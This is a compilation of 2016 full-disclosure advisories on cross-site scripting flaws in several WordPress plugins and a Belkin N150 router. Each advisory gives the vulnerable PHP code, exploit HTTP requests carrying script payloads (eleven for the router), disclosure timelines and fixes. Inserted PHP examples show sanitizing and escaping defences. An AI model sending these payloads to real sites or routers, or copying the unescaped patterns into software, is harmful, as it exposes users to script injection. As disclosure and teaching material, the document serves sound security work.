Persian-woocommerce-sms XSS Vulnerability

## FULL DISCLOSURE

#Product : Persian-woocommerce-sms
#Exploit Author : Rahul Pratap Singh
#Version : 3.3.2
#Home page Link : https://wordpress.org/plugins/persian-woocommerce-sms/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 21/4/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "ps_sms_numbers" parameter is not sanitized, which leads to an XSS vulnerability.

—————————————-
Vulnerable Code:
—————————————-

File Name: testfiles/persian-woocommerce-sms/lib/class.bulk.send.php
Found at line: 45
value="<?php /* raw POST value echoed into the attribute without escaping */ echo isset($_POST['ps_sms_numbers']) ? $_POST['ps_sms_numbers'] : '' ?>" style="direction:ltr; text-align:left; width:700px; max-width:100% !important"/><br/>

—————————————-

Fix:
Update to 3.3.4

Vulnerability Disclosure Timeline:
→ March 14, 2016  – Bug discovered, initial report to Vendor.
→ March 22, 2016  – No Response. Report sent again.
→ March 23, 2016  – WordPress Acknowledged.
→ April 21, 2016  – Full Disclosure.

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/persian-woocommerce-sms/changelog/

Soundy Background Music XSS Vulnerability

## FULL DISCLOSURE

#Product : Soundy Background Music
#Exploit Author : Rahul Pratap Singh
#Version : 3.1
#Home page Link : https://wordpress.org/plugins/soundy-background-music/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 12/3/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "war_soundy_audio_volume" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-

File: soundy.php, lines 1462-1473
if( $audio_volume_def == 'default' )
{
    $audio_volume = 'default';
}
else
{
    // raw POST value, stored without sanitization
    $audio_volume = $_POST[ 'war_soundy_audio_volume' ];
}
update_post_meta( $post_id,
                  'war_soundy_audio_volume',
                  $audio_volume );

—————————————-
POC:
—————————————-
[PoC screenshot: Soundy_Background_Music_XSS]

Fix:
Update to 3.2

Vulnerability Disclosure Timeline:
→ March  3, 2016  – Bug discovered, initial report to WordPress
→ March  7, 2016  – No response, Report sent again.
→ March  8, 2016  – WordPress response, plugin taken down
→ March 10, 2016  – Vendor deployed a patch

Pub Ref:
https://wordpress.org/plugins/soundy-background-music/changelog/

DW Question Answer XSS Vulnerability

## FULL DISCLOSURE

#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "_dwqa_anonymous_name" parameter is not sanitized, which leads to stored XSS.

—————————————-
Vulnerable Code:
—————————————-

User.php
function dwqa_get_author( $post_id = false ) {
    if ( !$post_id ) {
        $post_id = get_the_ID();
    }
    $display_name = false;
    if ( dwqa_is_anonymous( $post_id ) ) {
        // the stored anonymous name is returned as-is and later echoed unescaped
        $anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
        if ( $anonymous_name ) {
            $display_name = $anonymous_name;
        } else {
            $display_name = __( 'Anonymous', 'dwqa' );
        }
    } else {
        $user_id = get_post_field( 'post_author', $post_id );
        $display_name = get_the_author_meta( 'display_name', $user_id );
    }
    return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
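
The following is an added example, not code from the Soundy Background Music or DW Question Answer plugins. It shows the two-step defence for the stored XSS pattern in both advisories above: sanitize the value when it is written to post meta, and escape it for the HTML context when it is read back and echoed. The `*_safe` function names, the 0-100 volume range and the sample inputs are assumptions made for this example; the `function_exists()` stubs only let the file run under plain `php` outside WordPress, where the real `sanitize_text_field()` and `esc_html()` are used instead.

```php
<?php
// Added example, not plugin code. Stubs let the file run outside WordPress;
// inside WordPress the real functions are used and these bodies are skipped.
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        $str = strip_tags( (string) $str );                 // remove tags (approximation of the WP core behaviour)
        $str = preg_replace( '/[\r\n\t ]+/', ' ', $str );   // collapse whitespace
        return trim( $str );
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Save side (the soundy.php branch that stored $_POST['war_soundy_audio_volume'] raw):
// validate against what the setting can legitimately be before it reaches update_post_meta().
// Assumption for this example: a volume is either the literal 'default' or an integer 0-100.
function soundy_audio_volume_safe( array $post, $default = 'default' ) {
    if ( ! isset( $post['war_soundy_audio_volume'] ) ) {
        return $default;
    }
    $volume = sanitize_text_field( $post['war_soundy_audio_volume'] );
    if ( $volume === 'default' ) {
        return $volume;
    }
    // Anything that is not a small integer (markup included) falls back to the default.
    return ( ctype_digit( $volume ) && (int) $volume <= 100 ) ? $volume : $default;
}

// Output side (the User.php dwqa_get_author() path): a value read from post meta is
// still untrusted, so it is escaped for the HTML body context at the point of output.
function dwqa_author_name_safe( $anonymous_name ) {
    $name = sanitize_text_field( (string) $anonymous_name );
    if ( $name === '' ) {
        $name = 'Anonymous';
    }
    return esc_html( $name );
}

// Stand-alone demonstration with constructed inputs shaped like the advisories' payloads.
if ( PHP_SAPI === 'cli' ) {
    echo soundy_audio_volume_safe( array( 'war_soundy_audio_volume' => '<img src=x onerror=alert(1)>' ) ), PHP_EOL;
    echo soundy_audio_volume_safe( array( 'war_soundy_audio_volume' => '42' ) ), PHP_EOL;
    echo dwqa_author_name_safe( '"><img src=x onerror=alert(1)><!--' ), PHP_EOL;
}
```

Both halves matter: sanitizing on save keeps obviously bad data out of the database, but escaping on output is what actually prevents script execution, because data can also reach post meta through other code paths (imports, other plugins, direct database edits).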

—————————————-
Exploit:
—————————————-

POST /index.php/dwqa-ask-question/ HTTP/1.1

question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit

—————————————-
POC:
—————————————-
[PoC screenshot: DWQA_Stored_XSS]

Fix:
Update to 1.4.2.3

Vulnerability Disclosure Timeline:
→ March  3, 2016  – Bug discovered, initial report to WordPress
→ March  7, 2016  – No response, Report sent again.
→ March  8, 2016  – WordPress response, plugin taken down
→ March 11, 2016  – Vendor deployed a patch

Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/

Belkin N150 Router Multiple XSS Vulnerabilities

## FULL DISCLOSURE

#Product : Belkin N150 Home Router
#Exploit Author : Rahul Pratap Singh
#Home page Link : http://www.belkin.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Version : F9K1009 v1
#Firmware : 1.00.09
#Date : 24/Feb/2016

→ Vulnerability/BUG Report :

—————————————-
Description:
—————————————-
The Belkin N150 Home Router is vulnerable to cross-site scripting: numerous parameters of its web interface are not sanitized, which leads to XSS.

—————————————-
Vulnerable Code:
—————————————-
[Screenshots of the vulnerable code: belkinsessionxssvulcode, belkinxsspocvulcode, vul8]

—————————————-
Exploit and Poc:
—————————————-
1)
GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo
Cookie: sessionid="></a><img src=x onerror=alert(1)><a; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us
Connection: keep-alive

[PoC screenshot: belkinsessionxsspoc]

2)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

getpage=html%2Fpage.html&errorpage=< script>alert("xss")< /script>&var%3Apage=deviceinfo&var%3A errorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3A action=login&%3Asessionid=3921960f

[PoC screenshot: belkinxsspoc2]

3)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

getpage=html/page.html&errorpage=html/page.html&var:page="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

[PoC screenshot: belkinxsspoc3]

4)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 245

getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage= "< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

[PoC screenshot: belkinxsspoc4]

5)
GET /cgi-bin/webproc?getpage=< scRipt>prompt("xss")< /scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage =ut_firmware HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[PoC screenshot: belkinxsspoc5]

6)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[PoC screenshot: belkinxsspoc6]

7)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login& var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[PoC screenshot: belkinxsspoc7]

8)
GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[PoC screenshot: belkinxsspoc8]

9)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:CacheLastData="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

[PoC screenshot: belkinxsspoc9]

10)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f

[PoC screenshot: belkinxsspoc10]

11)
GET /cgi-bin/webproc?getpage=html/page.html&var:style="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

[PoC screenshot: belkinxsspoc11]

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to Belkin Security Team
→ February 24, 2016  – No response from vendor
→ February 24, 2016  – Full Disclosure

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Import Woocommerce XSS Vulnerability

## FULL DISCLOSURE

#Product : Import Woocommerce
#Exploit Author : Rahul Pratap Singh
#Version : 1.0.1
#Home page Link : https://wordpress.org/plugins/import-woocommerce/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "alertmsg" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File: index.php
Line:229-232

function translate_alertstr(){
    if(isset($_POST['alertmsg']))
        // raw POST value used as the translation string and echoed back unescaped
        echo __($_POST['alertmsg'],'import-woocommerce');

    die();
}

—————————————-
Exploit:
—————————————-
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=translate_alertstr&alertmsg="><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
[PoC screenshot: import-woocommercexsspoc]

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to WordPress
→ February 1, 2016     – WordPress response, plugin taken down
→ February 24, 2016  – Vendor Deployed a Patch

Pub Ref:
https://wordpress.org/plugins/import-woocommerce/changelog/

WP Ultimate Exporter XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Ultimate Exporter
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "export_name" and "export_post_type_name" parameters are not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: /wp-ultimate-exporter/includes/WUExporterUI.php

Found at line: 88
$export_post_type = isset($_REQUEST['export_name']) ? $_REQUEST['export_name'] : '' ;   // raw request value

Found at line: 89
$custom_post = isset($_REQUEST['export_post_type_name']) ? $_REQUEST['export_post_type_name'] : '' ;?>

Found at line: 91

<input type ="hidden" value = '<?php echo $export_post_type?>' name='export_type_name'>

Found at line: 92

<input type ="hidden" value = '<?php echo $custom_post?>' name='export_custompost_type'>
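
The following is an added example, not code from the Persian-woocommerce-sms or WP Ultimate Exporter plugins. Both advisories echo a request value straight into an HTML attribute; the example puts that vulnerable shape next to the hardened one, which sanitizes on read and escapes with `esc_attr()` at the attribute-context output. The function names and the sample input are assumptions; the stubs only let the file run under plain `php` outside WordPress, where the real core functions are used.

```php
<?php
// Added example, not plugin code. Stubs let the file run outside WordPress;
// inside WordPress the real esc_attr()/sanitize_text_field() are used instead.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        return trim( preg_replace( '/[\r\n\t ]+/', ' ', strip_tags( (string) $str ) ) );
    }
}

// Vulnerable shape (WUExporterUI.php lines 88/91): the raw request value lands inside value='...'.
function wue_hidden_field_unsafe( array $request ) {
    $export_post_type = isset( $request['export_name'] ) ? $request['export_name'] : '';
    return "<input type='hidden' value='" . $export_post_type . "' name='export_type_name'>";
}

// Hardened shape: esc_attr() entity-encodes ", ', < and >, so the value cannot close the
// attribute or the tag; sanitize_text_field() additionally drops any tags on the way in.
function wue_hidden_field_safe( array $request ) {
    $export_post_type = isset( $request['export_name'] )
        ? sanitize_text_field( $request['export_name'] )
        : '';
    return "<input type='hidden' value='" . esc_attr( $export_post_type ) . "' name='export_type_name'>";
}

// Stand-alone demonstration with a constructed input of the advisory's payload shape,
// using a single quote because this attribute is single-quoted.
if ( PHP_SAPI === 'cli' ) {
    $request = array( 'export_name' => "'/><input type=text onclick=alert(/XSS/)><!--" );
    echo wue_hidden_field_unsafe( $request ), PHP_EOL;   // the value terminates the attribute and the tag
    echo wue_hidden_field_safe( $request ), PHP_EOL;     // the value stays inside the attribute
}
```

Escaping has to match the output context: `esc_attr()` for attribute values, `esc_html()` for element text, `esc_url()` for URLs. Sanitizing on read alone is not enough, because a value that is harmless as text (for example one containing a bare `'`) can still terminate a single-quoted attribute.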

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_name="/><input type=text onclick=alert(/XSS/)><!--"

POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype

export_post_type_name="/><input type=text onclick=alert(/XSS/)><!--"

—————————————-
POC:
—————————————-
[PoC screenshots: wp-ultimate-exporter, wp-ultimate-exporter1]

Vulnerability Disclosure Timeline:
→ January  30, 2016   – Bug discovered, initial report to WordPress
→ February 1,  2016   – WordPress response, plugin taken down
→ February 24, 2016 – Plugin up with same version

WP Advanced Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : WP Advanced Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.1.1
#Home page Link : https://wordpress.org/plugins/wp-advanced-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "alertmsg" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File: index.php

function trans_xmlalert_str(){
    if(isset($_POST['alertmsg']))
        // raw POST value used as the translation string and echoed back unescaped
        echo __($_POST['alertmsg'],'wp-advanced-importer');

    die();
}

—————————————-
Exploit:
—————————————-
POST wordpress/wp-admin/admin-ajax.php

action=trans_xmlalert_str&alertmsg="><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
[PoC screenshot: wp-advanced-importerxsspoc]

Fix:
Update to 2.2

Vulnerability Disclosure Timeline:
→ January    30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016     –  WordPress response, plugin taken down
→ February 23, 2016   – Vendor Deployed a Patch

Pub Ref:
https://wordpress.org/plugins/wp-advanced-importer/changelog/

CSV Import XSS Vulnerability

## FULL DISCLOSURE

#Product : CSV Import
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/csv-import/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "alertmsg" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: csv-import/index.php

Found at line: 238

echo __($_POST['alertmsg'], 'csv-import');   // raw POST value used as the translation string and echoed unescaped
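
The following is an added example, not code from the Import Woocommerce, WP Advanced Importer or CSV Import plugins. It is a hardened replacement for the admin-ajax "alertmsg" handler pattern that all three advisories share: the handler verifies a nonce and a capability first, the client sends a message key instead of message text (so request data never becomes a `__()` translation string), and the looked-up text is escaped before it is echoed. The nonce action, the capability, the message keys and texts, and the `*_safe` name are assumptions; the stubs only let the file run under plain `php` outside WordPress.

```php
<?php
// Added example, not plugin code. Stubs let the file run outside WordPress;
// inside WordPress the real esc_html(), __() and sanitize_key() are used instead.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( '__' ) ) {
    function __( $text, $domain = 'default' ) { return $text; }
}
if ( ! function_exists( 'sanitize_key' ) ) {
    function sanitize_key( $key ) {
        return preg_replace( '/[^a-z0-9_\-]/', '', strtolower( (string) $key ) );
    }
}

// The only alert texts the endpoint can ever return (constructed for this example).
function csvimp_alert_messages() {
    return array(
        'import_ok'    => __( 'Import completed successfully.', 'csv-import' ),
        'file_missing' => __( 'Please choose a CSV file before importing.', 'csv-import' ),
        'bad_format'   => __( 'The uploaded file is not a valid CSV.', 'csv-import' ),
    );
}

// Pure part of the handler: map a request key to escaped text, or '' when unknown.
function csvimp_alert_text( $key ) {
    $messages = csvimp_alert_messages();
    $key      = sanitize_key( $key );
    if ( $key === '' || ! isset( $messages[ $key ] ) ) {
        return '';   // unknown key: emit nothing rather than reflect the request
    }
    return esc_html( $messages[ $key ] );
}

// AJAX callback. admin-ajax.php is reachable by any visitor, so authorization comes
// first; only then is the (now harmless) key looked up. Nonce action and capability
// are assumptions for this example.
function csvimp_trans_alertstr_safe() {
    check_ajax_referer( 'csvimp_alert', 'nonce' );   // dies on a missing or stale nonce
    if ( ! current_user_can( 'import' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $key = isset( $_POST['alertmsg'] ) ? wp_unslash( $_POST['alertmsg'] ) : '';
    echo csvimp_alert_text( $key );
    wp_die();
}
if ( function_exists( 'add_action' ) ) {
    add_action( 'wp_ajax_trans_csvimp_alertstr', 'csvimp_trans_alertstr_safe' );
}

// Stand-alone demonstration with constructed inputs, including the advisories' payload shape.
if ( PHP_SAPI === 'cli' ) {
    echo csvimp_alert_text( 'file_missing' ), PHP_EOL;
    echo csvimp_alert_text( '"><img src=x onerror=alert(1)>' ), PHP_EOL;   // not a registered key
}
```

Passing request data to `__()` is a second problem on top of the missing escaping: the string becomes a translation lookup key, and the escaping of whatever `__()` returns is still the caller's job. Whether the plugins registered the handler on `wp_ajax_` only or also on `wp_ajax_nopriv_` is not shown on the page; the nonce and capability check above make the handler safe in either case.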

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_csvimp_alertstr&alertmsg="><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
[PoC screenshot: csv-importxsspoc]

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January   30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016    – WordPress response, plugin taken down
→ February 23, 2016  – Vendor Deployed a Patch

Pub Ref:
https://wordpress.org/plugins/csv-import/changelog/

WP-Comment-Rating XSS Vulnerability

## FULL DISCLOSURE

#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link : http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The "tab" parameter is not sanitized, which leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: wpb_plugin_admin_page.php

line: 194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';   // raw GET value

line: 553
$active_tab = $this->current_tab;

line: 558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ? $this->tabs[0]->get_id() : $active_tab;

line: 561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' . $active_tab; ?>">   <!-- echoed into the class attribute without escaping -->
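
The following is an added example, not code from wp-comment-rating. It hardens the handling of the "tab" query parameter shown above in two layers: the requested value is resolved against the ids of the registered tabs (an allow-list), and the class attribute is escaped on output even so. The function names and the tab ids are assumptions; the `esc_attr()` stub only lets the file run under plain `php` outside WordPress.

```php
<?php
// Added example, not plugin code. Stub lets the file run outside WordPress;
// inside WordPress the real esc_attr() is used instead.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Replaces the line-194/558 logic: only a registered tab id can become the active tab;
// an unknown or missing value falls back to the first tab, never to the request string.
function wpb_resolve_active_tab( $requested, array $tab_ids ) {
    if ( empty( $tab_ids ) ) {
        return '';
    }
    return ( is_string( $requested ) && in_array( $requested, $tab_ids, true ) )
        ? $requested
        : $tab_ids[0];
}

// Replaces the line-561 markup: the whole class value goes through esc_attr(),
// so even a value that slipped past the allow-list could not close the attribute.
function wpb_wrap_div_open( $page_hook, $active_tab ) {
    $classes = 'wrap wrap-' . $page_hook . ' active-tab-' . $active_tab;
    return '<div class="' . esc_attr( $classes ) . '">';
}

// Stand-alone demonstration: constructed tab ids, and the advisory's payload shape as
// the requested tab when no real query string is present.
if ( PHP_SAPI === 'cli' ) {
    $tabs      = array( 'general', 'appearance', 'advanced' );
    $requested = isset( $_GET['tab'] ) ? $_GET['tab'] : '"><input type=text onclick=alert(/XSS/)><!--';
    $active    = wpb_resolve_active_tab( $requested, $tabs );
    echo wpb_wrap_div_open( 'comments_page_wpcommentrating', $active ), PHP_EOL;
    echo wpb_wrap_div_open( 'comments_page_wpcommentrating', wpb_resolve_active_tab( 'advanced', $tabs ) ), PHP_EOL;
}
```

The allow-list is the more important of the two layers here: the tab value does not only end up in an attribute, it also selects which settings content is rendered, so constraining it to known ids removes a whole class of surprises rather than just this one sink.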

—————————————-
Exploit:
—————————————-
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=">< input type=text onclick=alert(/XSS/)><!--

—————————————-
POC:
—————————————-
[PoC screenshot: wpcommentratingxsspoc]

Fix:
Update to 1.5.4

Vulnerability Disclosure Timeline:
